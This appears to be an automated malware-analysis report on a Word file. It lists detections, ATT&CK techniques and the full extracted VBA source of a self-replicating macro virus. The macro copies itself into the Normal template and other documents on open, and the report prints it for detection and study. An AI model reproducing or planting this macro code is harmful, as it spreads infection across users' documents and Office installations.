MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The file contains VBA macros, specifically a Document_Open macro, which is designed to replicate its malicious code into the Normal template. This behavior is indicative of an attempt to achieve persistence or infect other documents. The macro attempts to write its code into the Normal template, which is a common technique for malware.
Heuristics 4
-
ClamAV: Doc.Macro.APMPKILL-6097118-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.DeleteLines 1, .CountOfLines -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1025 bytes |
SHA-256: b6bb40c3324a9a55276682d3a04936515debedc19798cd9b4db60b6bc4ef53ca |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'KILL
On Error Resume Next
Set prevDocument = NormalTemplate
Set prevDocument = ActiveDocument
Set nextDocument = NormalTemplate
MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
If ThisDocument = NormalTemplate Then _
Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Host
If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, MyCode
If ThisDocument = NormalTemplate Then _
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End With
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.